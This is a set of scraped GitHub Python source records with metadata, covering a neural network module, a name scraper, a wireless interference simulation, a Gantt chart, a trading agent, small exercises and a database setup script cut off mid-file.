Zs, Ks), 1)\n\n Q = Q.reshape(b, 1, 1, qh * qw, -1)\n Q = repeat(Q, 'b v c i j -> b (x v) (y c) i j', x=cv, y=m) # b m 4 hw -1, v=1, c=1\n Z = Z.reshape(b, 1, m, zh * zw, -1)\n Z = repeat(Z, 'b v m i j -> b (x v) m i j', x=cv) # b 4 m hw -1, v=m\n\n t = lambda tensor: rearrange(tensor, 'b v m n d -> b v m d n')\n\n A = Q @ (torch.tanh(t(Z) @ Z) + self.label_coef) @ t(K) # b, v, m, qh*qw x kh*hw\n A = torch.relu(torch.sum(torch.tanh(A), 1).sum(1))\n\n return A, QZK # b, out_dim*[(mv+1)heads + 1], qh, qw\n\n @staticmethod\n def view_aug(x, v=0, r=False):\n assert 0 <= v <= 2\n \"v shall be in range of 0-4\"\n\n if v == 1:\n return x.flip(3) # flip vertically\n elif v == 2:\n # return x.flip(3) # flip vertically\n return x.permute(0, 1, 3, 2) # transpose\n # elif v == 3:\n # return x.transpose(2, 3).flip(3 if not r else 2) # rotation 270\n else:\n return x\n\n\nclass GCN_Layer(nn.Module):\n def __init__(self, in_features, out_features, bnorm=True,\n activation=None, dropout=None, adj=True):\n super(GCN_Layer, self).__init__()\n self.bnorm = bnorm\n self.adj = adj\n fc = [nn.Linear(in_features, out_features)]\n if bnorm:\n fc.append(BatchNorm1d_GNN(out_features))\n if activation is not None:\n fc.append(activation)\n if dropout is not None:\n fc.append(nn.Dropout(dropout))\n self.fc = nn.Sequential(*fc)\n\n def forward(self, data):\n x, A, is_norm = data\n\n if not is_norm:\n max_coef = torch.sum(A, dim=2) + 1.e-7\n A = A/max_coef.unsqueeze(dim=2)\n # A = torch.softmax(A, 2)\n # A = torch.tanh(A)\n\n y = self.fc(torch.bmm(A, x))\n\n return [y, A, True]\n\n\nclass PAF_block(nn.Module):\n def __init__(self,\n in_ch,\n hidden_ch,\n kernel=6,\n heads=3,\n m_views=4,\n depth=1,\n dropout=0.,\n norm=True,\n activation=None,\n shortcut=True,\n eps=2e-8):\n super(PAF_block, self).__init__()\n self.eps = eps\n if in_ch is None:\n self.in_ch = {'q': 256, 'z': 512, 'k': 1024}\n else:\n self.in_ch = in_ch\n\n if activation is None:\n self.activation = nn.PReLU()\n else:\n self.activation = activation\n self.sum = shortcut\n self.kernel = kernel\n self.heads = heads\n self.qzk_A = Encoder_AE(self.in_ch, self.kernel, heads, m_views)\n self.rs = nn.Sequential(\n nn.Conv2d(self.kernel * (heads * (m_views + 1) + 1),\n hidden_ch,\n kernel_size=3, stride=1, padding=1, bias=False),\n self.activation,\n nn.BatchNorm2d(hidden_ch, momentum=0.01),\n nn.Dropout2d(dropout),\n )\n\n self.gcn_k = nn.ModuleList([])\n for i in range(depth):\n in_feat = self.in_ch['k'] if i == 0 else hidden_ch\n adj = True if i == 0 else False\n self.gcn_k.append(\n GCN_Layer(in_features=in_feat, out_features=hidden_ch, bnorm=norm,\n activation=self.activation, dropout=dropout, adj=adj)\n )\n\n def forward(self, x):\n b, _, hh, ww = x['q'].size()\n _, ch, kh, kw = x['k'].size()\n _, cz, zh, zw = x['z'].size()\n # ENCoder\n A, qzk= self.qzk_A(x) # b n md, b v m n d\n\n gx = x['k'].reshape(b, -1, ch)\n lap_norm = False\n\n for s, gcn in enumerate(self.gcn_k):\n if s==0:\n gx, A, lap_norm = gcn((gx, A, lap_norm))\n else:\n gx = F.interpolate(gx.reshape(b, -1, hh, ww), (kh, kw), mode='bilinear', align_corners=False)\n gx, A, lap_norm = gcn((gx.reshape(b, kh*kw, -1), A, lap_norm))\n\n\n if self.sum:\n return gx.reshape(b, -1, hh, ww) + self.rs(qzk) , A, 0\n else:\n return gx.reshape(b, -1, hh, ww), A, 0\n\n\n\n\n\n","repo_name":"samleoqh/MultiModNet","sub_path":"lib/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":6948,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40187969125","text":"from urllib.request import urlopen as uReq\nfrom bs4 import BeautifulSoup as soup\n\nurlGirl = 'https://www.babble.com/pregnancy/1000-most-popular-girl-names/'\n\n\n# Opens a connection, grabs the page\nuClient = uReq(urlGirl)\npage_Html = uClient.read()\nuClient.close()\n\n# HTML Parsing\npage_soup = soup(page_Html, \"html.parser\")\n\n# Grabs each name\nname = page_soup.find('div',{'class':'tm-content-container tm-content-container--wide'})\n\nfilename = \"babyGirlNames.csv\"\nf = open(filename, 'w')\n\nheaders = 'Names\\n'\nf.write(headers)\n\ngirl = name.main.ol.text\n\n# Need to edit data because of unwanted 'ads' in four names\nf.write(girl.replace('Related PostBiblical Girl Names That Truly Are Timeless', ' ')) \n\n\nf.close()","repo_name":"Amonteverde04/Babies-Program","sub_path":"babyScrapeGirl/babyScrape.py/babyScrape.py.py","file_name":"babyScrape.py.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19074535730","text":"def friispathloss(wavelength, d):\r\n return (wavelength/(4*np.pi*d))**2\r\n\r\ndef exppathloss(d, B):\r\n return 1E-3 - 10*B*np.log10(d)\r\n\r\ne = np.random.normal(0, 8, 1)\r\n\r\ndef expshadowpathloss(d, B):\r\n return 1E-3 - 10*B*np.log10(d) + e\r\n\r\ntargetcells = np.array(targetcells)\r\npowers = np.array(list(map(friispathloss, targetcells[0:, 2], distances)))\r\n\r\npowers.resize((60,1))\r\ntargetcells = np.concatenate((targetcells, powers), axis=1)\r\n\r\ncellnum = targetcells[0][1]\r\nsplits = []\r\ndiv = 0\r\n\r\nfor i in range(len(targetcells)):\r\n if targetcells[i][1] == cellnum:\r\n div += 1\r\n else: \r\n splits.append(div)\r\n div = 1\r\n cellnum = targetcells[i][1]\r\n\r\nidx = 0\r\nfor i in splits:\r\n plt.plot(range(idx,idx+i), targetcells[idx:idx+i,3:4], 'x', linestyle='-' ,label=targetcells[idx][1])\r\n idx = idx+i\r\n\r\nplt.title('Recieved Power vs. Time')\r\nplt.xlabel('Frame Number (30 FPS)')\r\nplt.ylabel('Recieved Power [W]')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\np3 = np.array(list(map(exppathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=3,\r\n dtype=np.int))))\r\n\r\np3s = np.array(list(map(expshadowpathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=3,\r\n dtype=np.int))))\r\n\r\np4 = np.array(list(map(exppathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=4,\r\n dtype=np.int))))\r\n\r\np4s = np.array(list(map(expshadowpathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=4,\r\n dtype=np.int))))\r\n\r\ncellnum = targetcells[0][1]\r\nsplits = []\r\ndiv = 0\r\n\r\nfor i in range(len(targetcells)):\r\n if targetcells[i][1] == cellnum:\r\n div += 1\r\n else: \r\n splits.append(div)\r\n div = 1\r\n cellnum = targetcells[i][1]\r\n\r\nsplits.append(div)\r\n\r\nidx = 0\r\nfor i in splits:\r\n plt.plot(range(idx,idx+i), np.zeros(idx+i-idx)-100, 'x', label=targetcells[idx][1])\r\n idx = idx+i\r\n\r\nplt.plot(p3, linestyle = '--', label = 'Exp 3')\r\nplt.plot(p3s, linestyle=':', label = 'Exp 3 + Shadow')\r\nplt.plot(p4, linestyle = '-.', label = 'Exp 4')\r\nplt.plot(p4s, label = 'Exp 4 + Shadow')\r\nplt.title('Downlink Signal Power vs. Time')\r\nplt.xlabel('Frame Number (30 FPS)')\r\nplt.ylabel('Downlink Signal Power [dBm]')\r\n\r\nplt.legend(bbox_to_anchor=(1,1))\r\nplt.show()\r\n\r\nfig = plt.figure()\r\nax = plt.gca()\r\nax.set_aspect(1)\r\n#plt.xlim(-300,300)\r\n#plt.ylim(-300,300)\r\nax.set_title('Cell Mobile User Animation - First Tier Downlink Interference')\r\nax.set_xlabel('X (meters)')\r\nax.set_ylabel('Y (meters)')\r\n\r\nplt.rcParams['animation.ffmpeg_path'] = '/usr/local/bin/ffmpeg'\r\nnumFrames = 60\r\nims=[]\r\nmobilePosX = np.linspace(-170,170,numFrames)\r\nmobilePosY = np.linspace(-170,170,numFrames)\r\n\r\nchannels = channelCenters(center, ni, nj, radius)\r\nall = channels.copy()\r\n\r\nzippedcells = []\r\ndistances = []\r\ntargetcells = []\r\n\r\n# Draw the serving cells and label them\r\nfor j in range(len(channels)):\r\n k = drawCluster(channels[j], N, radius)\r\n for i in range(len(k)):\r\n drawCell(k[i],radius,labels[i]+subscripts[j])\r\n cell = [k[i], labels[i]+subscripts[j], 1/frequencies[i]]\r\n zippedcells.append(cell)\r\n\r\nzippedcells = np.array(zippedcells, dtype=object)\r\n\r\nfor frames in range(numFrames):\r\n \r\n # Find the corresponding serving cell\r\n idx, distance = findServingCell([mobilePosX[frames],mobilePosY[frames]], zippedcells[0:,0])\r\n #print(channels[idx][0])\r\n distances.append(distance)\r\n targetcells.append(zippedcells[idx])\r\n # Draw a line connecting the center (basestation) of the serving cell \r\n # and the mobile user\r\n #im, = plt.plot([0,mobilePosX[frames]],[0,mobilePosY[frames]], marker = 'x', color = 'red', animated=True)\r\n\r\n im = plt.plot( [zippedcells[idx+7,0][0],mobilePosX[frames]], [zippedcells[idx+7,0][1],mobilePosY[frames]], marker = 'x', color = 'red', animated=True)\r\n im2 = plt.plot( [zippedcells[idx+14,0][0],mobilePosX[frames]], [zippedcells[idx+14,0][1],mobilePosY[frames]], marker = 'x', color = 'green', animated=True)\r\n im3 = plt.plot( [zippedcells[idx+21,0][0],mobilePosX[frames]], [zippedcells[idx+21,0][1],mobilePosY[frames]], marker = 'x', color = 'blue', animated=True)\r\n im4 = plt.plot( [zippedcells[idx+28,0][0],mobilePosX[frames]], [zippedcells[idx+28,0][1],mobilePosY[frames]], marker = 'x', color = 'red', animated=True)\r\n im5 = plt.plot( [zippedcells[idx+35,0][0],mobilePosX[frames]], [zippedcells[idx+35,0][1],mobilePosY[frames]], marker = 'x', color = 'green', animated=True)\r\n im6 = plt.plot( [zippedcells[idx+42,0][0],mobilePosX[frames]], [zippedcells[idx+42,0][1],mobilePosY[frames]], marker = 'x', color = 'blue', animated=True)\r\n\r\n # Draw the mobile user at the appropriate location\r\n #im2, = plt.plot(mobilePosX[frames],mobilePosY[frames],'r+', animated=True)\r\n ims.append(im+im2+im3+im4+im5+im6)\r\n\r\nani = animation.ArtistAnimation(fig, ims, interval=50, blit=True, repeat_delay=1000)\r\n\r\nrc('animation', html='jshtml')\r\nani\r\nani.save('drawCellFTI.gif', writer='pillow')\r\n#plt.show()\r\n\r\ndef dis(x1, y1, x2, y2):\r\n return np.sqrt((x1-x2)**2 + (y1-y2)**2)\r\n\r\nidxs = []\r\n\r\nfor frames in range(numFrames):\r\n # Find the corresponding serving cell\r\n idx, distance = findServingCell([mobilePosX[frames],mobilePosY[frames]], zippedcells[0:,0])\r\n idxs.append(idx)\r\n \r\n \r\n #distances.append(distance)\r\n #targetcells.append(zippedcells[idx])\r\n\r\np3iarray = []\r\np3isarray = []\r\np4iarray = []\r\np4isarray = []\r\n\r\n\r\nfor i, num in enumerate(idxs):\r\n totalpower = 0\r\n p3i = 0\r\n p3is = 0\r\n p4i = 0\r\n p4is = 0\r\n print(zippedcells[num][1])\r\n for j in range(1, 7):\r\n d = dis(mobilePosX[i], mobilePosY[i], zippedcells[0:,0][num+j*7][0], zippedcells[0:,0][num+j*7][1])\r\n \r\n p3i = p3i + exppathloss(d, 3)\r\n print(d, ':', p3i)\r\n p3is = p3is + expshadowpathloss(d, 3)\r\n p4i = p4i + exppathloss(d, 4)\r\n p4is = p4is + expshadowpathloss(d, 4)\r\n\r\n print(p3i)\r\n p3iarray.append(p3i)\r\n p3isarray.append(p3is)\r\n p4iarray.append(p4i)\r\n p4isarray.append(p4is)\r\n\r\ncellnum = targetcells[0][1]\r\nsplits = []\r\ndiv = 0\r\nprint(len(targetcells))\r\n\r\nfor i in range(len(targetcells)):\r\n if targetcells[i][1] == cellnum:\r\n div += 1\r\n\r\n else: \r\n splits.append(div)\r\n div = 1\r\n cellnum = targetcells[i][1]\r\n\r\nsplits.append(div)\r\nidx = 0\r\nprint(splits)\r\nfor i in splits:\r\n plt.plot(range(idx,idx+i), np.zeros(idx+i-idx)-700, 'x', label=targetcells[idx][1])\r\n idx = idx+i\r\n\r\nplt.plot(p3iarray, linestyle = '--', label = 'Exp 3')\r\nplt.plot(p3isarray, linestyle=':', label = 'Exp 3 + Shadow')\r\nplt.plot(p4iarray, linestyle = '-.', label = 'Exp 4')\r\nplt.plot(p4isarray, label = 'Exp 4 + Shadow')\r\nplt.title('Downlink Interference Power vs. Time')\r\nplt.xlabel('Frame Number (30 FPS)')\r\nplt.ylabel('Downlink Iterference Power [dBm]')\r\n\r\nplt.legend(bbox_to_anchor=(1,1))\r\nplt.show()\r\n\r\np3 = np.array(list(map(exppathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=3,\r\n dtype=np.int))))\r\n\r\np3s = np.array(list(map(expshadowpathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=3,\r\n dtype=np.int))))\r\n\r\np4 = np.array(list(map(exppathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=4,\r\n dtype=np.int))))\r\n\r\np4s = np.array(list(map(expshadowpathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=4,\r\n dtype=np.int))))\r\n\r\nidx = 0\r\nfor i in splits:\r\n plt.plot(range(idx,idx+i), np.zeros(idx+i-idx), 'x', label=targetcells[idx][1])\r\n idx = idx+i\r\n\r\nplt.plot(p3/p3iarray, linestyle = '--', label = 'Exp 3')\r\nplt.plot(p3s/p3isarray, linestyle=':', label = 'Exp 3 + Shadow')\r\nplt.plot(p4/p4iarray, linestyle = '-.', label = 'Exp 4')\r\nplt.plot(p4s/p4isarray, label = 'Exp 4 + Shadow')\r\nplt.title('Downlink SIR vs. Time')\r\nplt.xlabel('Frame Number (30 FPS)')\r\nplt.ylabel('Downlink Ratio')\r\n\r\nplt.legend(bbox_to_anchor=(1,1))\r\nplt.show()","repo_name":"chrisuzokwe/wireless-communications","sub_path":"cuzokwe-hw2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35660830934","text":"import plotly.express as px\nimport plotly\nimport pandas as pd\nimport xlrd\nfrom openpyxl import Workbook\nimport plotly.figure_factory as ff\n\n\n# Read Dataframe from Excel file\n# df = Workbook('task.xlsx')\n\ndf = pd.read_excel('task.xlsx')\n# df = xlrd.open_workbook('task.xlsx')\n\n# Assign Columns to variables\ntasks = df['Task']\nstart = df['Start']\nfinish = df['Finish']\ncomplete = df['Complete in %']\n\nprint(complete)\n\n# Create Gantt Chart\nfig = px.timeline(df, x_start=start, x_end=finish, y=tasks, color=complete)\n\n\"\"\" fig = px.timeline(df, x_start=start, x_end=finish, y=tasks, color=complete, title='Task Overview', \ncolor_continuous_scale = [(0, \"red\"), (0.5, \"yellow\"), (1, \"green\")]) \"\"\"\n\n# Update Change Layout - Optional\nfig.update_yaxes(autorange='reversed')\nfig.update_layout(\n title_font_size=42,\n font_size=18,\n title_font_family='Arial'\n)\n\n# Interactive Gyntt\nfig = ff.create_gantt(df)\n\n# Save Graph and export to HTML\nplotly.offline.plot(fig, filename='Task_Overview_Gantt.html')","repo_name":"Kupavtsev/Excel_Python","sub_path":"InteractiveDiagramInPython_Excel/Gant_Python.py","file_name":"Gant_Python.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71876975848","text":"from typing import Optional\nfrom listnode import ListNode, create_single_linked_list\n\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head or (head and not head.next):\n return head\n\n\n penultimate = head\n iterator = head.next\n last = None\n\n while iterator:\n last = iterator\n iterator = iterator.next\n last.next = penultimate\n if penultimate is head:\n penultimate.next = None\n penultimate = last\n\n return iterator if iterator else last\n\n\n\nsolution = Solution()\nl1 = create_single_linked_list([])\nsolution.reverseList(head = l1).print()","repo_name":"nikpopesku/leetcode","sub_path":"python/200-299/206_reverse_linked_list.py","file_name":"206_reverse_linked_list.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30134040438","text":"# # print('Hello Brian')\n# x = int(input())\n# y = int(input())\n# z = x +y\n# print(z)\n\n\n#functions\n# def sum (x,y):\n# return x+y\n\n# print(sum(6,5))\n\n#loops\nfor i in range(0,100):\n if i % 2==0:\n print(i)","repo_name":"KariukiAbel/Blockchain-Cryptocurrency-with-python","sub_path":"oop/first python script.py","file_name":"first python script.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18453385140","text":"import json\r\nimport os\r\nimport pandas as pd\r\nimport pickle\r\nfrom collections import defaultdict\r\nimport utils\r\nimport clustering\r\nimport SQL\r\n\r\n\r\n# Setting Working Directory\r\nos.chdir(r'C:\\Users\\yk659ah\\Desktop\\EY\\Proyectos\\2019\\Smart Maps')\r\n\r\n# Open Config JSON\r\nwith open('./data_models/data_models.json') as handle:\r\n load_config = json.load(handle)\r\n\r\ndef preprocessing():\r\n \"\"\"Pipeline for pre-processing data\r\n\r\n Args:\r\n None\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n\r\n for sm in load_config['SM']:\r\n\r\n # Initialization of variables\r\n folder = sm['name']\r\n drop_cols = defaultdict(list)\r\n\r\n # Pickle load\r\n with open('./data/' + folder + '/df_' + folder + '.pickle', 'rb') as handle:\r\n df = pickle.load(handle)\r\n\r\n # Check if DataFrame is not empty\r\n if df.shape[0] == 0:\r\n\r\n print('Empty DataFrame for: ' + folder)\r\n\r\n continue\r\n\r\n ######################\r\n # METRIC CALCULATION #\r\n ######################\r\n\r\n # Calculate metrics and merge into final analysis DataFrame\r\n df = SQL.metric_calculation(df)\r\n\r\n ##################\r\n # MISSING VALUES #\r\n ##################\r\n\r\n # Correct blanks to nan\r\n df = utils.white_to_nan(df)\r\n\r\n # Check if there are any missing values, if not skip certain operations\r\n nulls = pd.isnull(df).sum().sum()\r\n\r\n if nulls > 0:\r\n\r\n # Visualize NaN values\r\n utils.missing_visuals(df)\r\n\r\n # Remove columns with high nan percentage\r\n old_cols = df.columns\r\n df = df.dropna(axis=1, thresh=0.9)\r\n drop_cols['high_nan'].append([i for i in old_cols if i not in df.columns])\r\n\r\n # Remove rows with full nan\r\n df = df.dropna(axis=0, how='all')\r\n\r\n # Convert to datetime possible date columns\r\n df = utils.datetime_cols(df)\r\n\r\n # Create synthetic dates\r\n df = utils.synthetic_dates(df)\r\n\r\n ############\r\n # IMPUTING #\r\n ############\r\n\r\n # Initialize object\r\n dict_impute = {}\r\n\r\n if nulls > 0:\r\n\r\n dict_impute = utils.imputing_nan(df)\r\n\r\n else:\r\n\r\n dict_impute['no_impute'] = df\r\n\r\n ############\r\n # CLEANING #\r\n ############\r\n\r\n # For each imputed DataFrame\r\n for impute in dict_impute.keys():\r\n\r\n df = dict_impute[impute]\r\n\r\n # Remove duplicates\r\n df = df.drop_duplicates(keep='first')\r\n df = df.reset_index(drop=True)\r\n\r\n # Remove columns that are unique identifiers\r\n df, drop_cols = utils.remove_identifier_columns(df, drop_cols)\r\n\r\n # Remove one-value columns\r\n df, drop_cols = utils.remove_one_value_columns(df, drop_cols)\r\n\r\n # Convert to categorical possible categorical columns\r\n df, changed_cols = utils.search_categorical(df, 0.001)\r\n\r\n # Remove outliers using zscore\r\n df = utils.remove_outliers(df, 3)\r\n\r\n # Assign target labels\r\n df, target_cols = utils.apply_business_rules(df, folder)\r\n\r\n ##################\r\n # PRE-PROCESSING #\r\n ##################\r\n\r\n # Pickle save\r\n with open('./data/' + folder + '/df_' + impute + '_' + folder + '_noOHE.pickle', 'wb') as handle:\r\n pickle.dump((df, target_cols), handle)\r\n\r\n # Perform One-Hot Encoding for categorical columns\r\n df, list_new_columns, drop_cols = utils.one_hot_encoding(df, 5, 1, drop_cols)\r\n\r\n # Standarize and Normalize DataFrame\r\n df = utils.standarize_normalize(df, target_cols, list_new_columns)\r\n\r\n dict_impute[impute] = df\r\n\r\n # Pickle save\r\n with open('./data/' + folder + '/df_' + impute + '_' + folder + '_OHE.pickle', 'wb') as handle:\r\n pickle.dump((df, target_cols), handle)\r\n\r\n\r\ndef clustering_analysis(sm_name, impute):\r\n \"\"\"Pipeline for clustering analysis\r\n\r\n Args:\r\n None\r\n Returns:\r\n None\r\n \"\"\"\r\n\r\n # Pickle load\r\n with open('./data/' + sm_name + '/df_' + impute + '_' + sm_name + '_OHE.pickle', 'rb') as handle:\r\n df, target_cols = pickle.load(handle)\r\n\r\n # Separate target from DataFrame\r\n df_target = df[target_cols]\r\n df = df.drop(columns=target_cols)\r\n\r\n ###################\r\n # DISCRETIZE DATA #\r\n ###################\r\n\r\n df = utils.discretize_data(df)\r\n\r\n #######################\r\n # CLUSTERING ANALYSIS #\r\n #######################\r\n\r\n # Retrieve all clusters from different methods\r\n dict_clusters = clustering.cluster_search(df)\r\n\r\n # Pickle save\r\n with open('./data/' + sm_name + '/dict_clusters_' + impute + '_' + sm_name + '.pickle', 'wb') as handle:\r\n pickle.dump(dict_clusters, handle)\r\n\r\n # Pickle load\r\n with open('./data/' + sm_name + '/dict_clusters_' + impute + '_' + sm_name + '.pickle', 'rb') as handle:\r\n dict_clusters = pickle.load(handle)\r\n\r\n ######################\r\n # DIMENSION REDUCTION #\r\n ######################\r\n\r\n # Select k clusters based on silhouette analysis\r\n model = dict_clusters['kmeans_6']\r\n\r\n # Performing Reduction using PCA and t-SNE\r\n dict_reduction = clustering.dimension_reduction(df, model)\r\n\r\n # Pickle save\r\n with open('./data/' + sm_name + '/dict_reduction_' + impute + '_' + sm_name + '.pickle', 'wb') as handle:\r\n pickle.dump(dict_reduction, handle)\r\n\r\n # Pickle load\r\n with open('./data/' + sm_name + '/dict_reduction_' + impute + '_' + sm_name + '.pickle', 'rb') as handle:\r\n dict_reduction = pickle.load(handle)\r\n\r\n # Plot clusters for different Reductions\r\n clustering.plot_clusters(dict_reduction, df_target, 1000)\r\n","repo_name":"flying-marmot/project-utils","sub_path":"feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6533720867","text":"# -*- coding:utf-8 -*-\nfrom agents.agent import Agent\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport os\n\n\nclass Actor(nn.Module):\n def __init__(self, s_dim, a_dim, b_dim, rnn_layers=1, dp=0.2):\n super(Actor, self).__init__()\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.b_dim = b_dim\n self.rnn_layers = rnn_layers\n self.gru = nn.GRU(self.s_dim, 128, self.rnn_layers, batch_first=True)\n self.fc_s_1 = nn.Linear(128, 128)\n self.fc_s_2 = nn.Linear(128, 64)\n self.fc_s_out = nn.Linear(64, 1)\n self.fc_pg_1 = nn.Linear(128, 128)\n self.fc_pg_2 = nn.Linear(128, 64)\n self.fc_pg_out = nn.Linear(64, self.a_dim)\n self.relu = nn.ReLU()\n self.tanh = nn.Tanh()\n self.dropout = nn.Dropout(p=dp)\n self.softmax = nn.Softmax(dim=-1)\n self.initial_hidden = torch.zeros(self.rnn_layers, self.b_dim, 128, dtype=torch.float32)\n \n def forward(self, state, hidden=None, train=False):\n state, h = self.gru(state, hidden)\n if train:\n state = self.dropout(state)\n sn_out = self.relu(self.fc_s_1(state))\n sn_out = self.relu(self.fc_s_2(sn_out))\n sn_out = self.fc_s_out(sn_out)\n \n pn_out = self.relu(self.fc_pg_1(state))\n pn_out = self.relu(self.fc_pg_2(pn_out))\n pn_out = self.softmax(self.fc_pg_out(pn_out))\n return pn_out, sn_out, h.data\n\n\nclass RPGAgent(Agent):\n def __init__(self, s_dim, a_dim, b_dim, batch_length=64, learning_rate=1e-3, rnn_layers=1):\n super().__init__()\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.b_dim = b_dim\n self.batch_length = batch_length\n self.pointer = 0\n self.s_buffer = []\n self.a_buffer = []\n self.s_next_buffer = []\n self.r_buffer = []\n \n self.train_hidden = None\n self.trade_hidden = None\n self.actor = Actor(s_dim=self.s_dim, a_dim=self.a_dim, b_dim=self.b_dim, rnn_layers=rnn_layers)\n self.optimizer = optim.Adam(self.actor.parameters(), lr=learning_rate)\n \n def _trade(self, state, train=False):\n with torch.no_grad():\n a, _, self.trade_hidden = self.actor(state[:, None, :], self.trade_hidden, train=False)\n if train:\n return torch.multinomial(a[:, 0, :], 1)\n else:\n return a[:, 0, :].argmax(dim=1)\n \n def trade(self, state):\n state_ = torch.tensor(state,dtype=torch.float32)\n action = self._trade(state_).numpy()\n return action\n \n def train(self):\n self.optimizer.zero_grad()\n s = torch.stack(self.s_buffer).t()\n s_next = torch.stack(self.s_next_buffer).t()\n r = torch.stack(self.r_buffer).t()\n a = torch.stack(self.a_buffer).t()\n a_hat, s_next_hat, self.train_hidden = self.actor(s, self.train_hidden, train=True)\n mse_loss = torch.nn.functional.mse_loss(s_next_hat, s_next)\n nll = -torch.log(a_hat.gather(2, a))\n pg_loss = (nll * r).mean()\n loss = mse_loss + pg_loss\n loss.backward()\n for param in self.actor.parameters():\n param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n \n def reset_model(self):\n self.s_buffer = []\n self.a_buffer = []\n self.s_next_buffer = []\n self.r_buffer = []\n self.trade_hidden = None\n self.train_hidden = None\n self.pointer = 0\n \n def save_transition(self, state, action, reward, next_state):\n if self.pointer < self.batch_length:\n self.s_buffer.append(torch.tensor(state, dtype=torch.float32))\n self.a_buffer.append(torch.tensor(action))\n self.r_buffer.append(torch.tensor(reward[:, None], dtype=torch.float32))\n self.s_next_buffer.append(torch.tensor(next_state, dtype=torch.float32))\n self.pointer += 1\n else:\n self.s_buffer.pop(0)\n self.a_buffer.pop(0)\n self.r_buffer.pop(0)\n self.s_next_buffer.pop(0)\n self.s_buffer.append(torch.tensor(state, dtype=torch.float32))\n self.a_buffer.append(torch.tensor(action))\n self.r_buffer.append(torch.tensor(reward[:, None], dtype=torch.float32))\n self.s_next_buffer.append(torch.tensor(next_state, dtype=torch.float32))\n \n def load_model(self, model_path='./RPG_Torch'):\n self.actor = torch.load(model_path + '/model.pkl')\n \n def save_model(self, model_path='./RPG_Torch'):\n if not os.path.exists(model_path):\n os.mkdir(model_path)\n torch.save(self.actor, model_path + '/model.pkl')\n","repo_name":"yuriak/RLQuant","sub_path":"agents/rpg_agent.py","file_name":"rpg_agent.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","stars":315,"dataset":"github-code","pt":"53"} +{"seq_id":"33125820776","text":"namen = []\nleeftijden = []\na = 0\nvraag = True\n\ndef namen_leeftijden(l):\n global vraag\n naam = input(\"Voer een naam in:\\nOf voer stop in om te stoppen:\\n>>> \")\n if naam == \"stop\":\n vraag = False\n return False\n leeftijd = input(\"Voer een leeftijd in: \")\n namen.append(naam)\n leeftijden.append(leeftijd)\n return{'naam':naam, 'leeftijd':leeftijd}\n\nwhile vraag:\n namen_leeftijden()\n \nfor i in namen:\n print(f'{i} is {leeftijden[a]} jaar')\n a +=1","repo_name":"NoaStack/leren_programmeren","sub_path":"module05_functions/namen_en_leeftijden.py","file_name":"namen_en_leeftijden.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5686233612","text":"import sys\nN = int(input())\ndata = []\nfor i in range (N) :\n word = sys.stdin.readline().rstrip()\n data.append((len(word),word))\ndata = list(set(data))\ndata.sort(key =lambda data : (data[0],data[1]))\n\nfor i in range(len(data)) :\n print(data[i][1])","repo_name":"woodypef/tolife","sub_path":"Baekjoon/silver/silver5/[1181]단어정렬.py","file_name":"[1181]단어정렬.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27439943563","text":"import databases\nimport sqlalchemy\nfrom sqlalchemy.sql import text\nimport os\nfrom dotenv import load_dotenv\nload_dotenv(\".env\")\n\nDATABASE_URL = os.environ[\"DATABASE_URL\"]\nprint(DATABASE_URL)\n\nDB_MOTOR = os.environ[\"DB_MOTOR\"]\nDB_USER = os.environ[\"DB_USER\"]\nDB_PASSWORD = os.environ[\"DB_PASSWORD\"]\nDB_HOSTNAME = os.environ[\"DB_HOSTNAME\"]\nDB_PORT = os.environ[\"DB_PORT\"]\nDB_NAME = os.environ[\"DB_NAME\"]\nPGADMIN_EMAIL = os.environ[\"PGADMIN_EMAIL\"]\nPGADMIN_PASSWORD = os.environ[\"PGADMIN_PASSWORD\"]\n\n# DB_MOTOR + DB_USER +\":\"+DB_PASSWORD +\"@\" +DB_HOSTNAME +\":\" +DB_PORT +\"/\"+DB_NAME\n\nDATABASE_URL = \"{}{}:{}@{}:{}/{}\".format(\n DB_MOTOR,\n DB_USER,\n DB_PASSWORD,\n DB_HOSTNAME,\n DB_PORT,\n DB_NAME)\nprint(DATABASE_URL)\n\n#database = databases.Database(DATABASE_URL)\n\n\nmetadata = sqlalchemy.MetaData()\nengine = sqlalchemy.create_engine(DATABASE_URL)\ndatabase = engine.connect()\n\n\n\n\nregister_of_calls_and_puts_actions = sqlalchemy.Table(\n 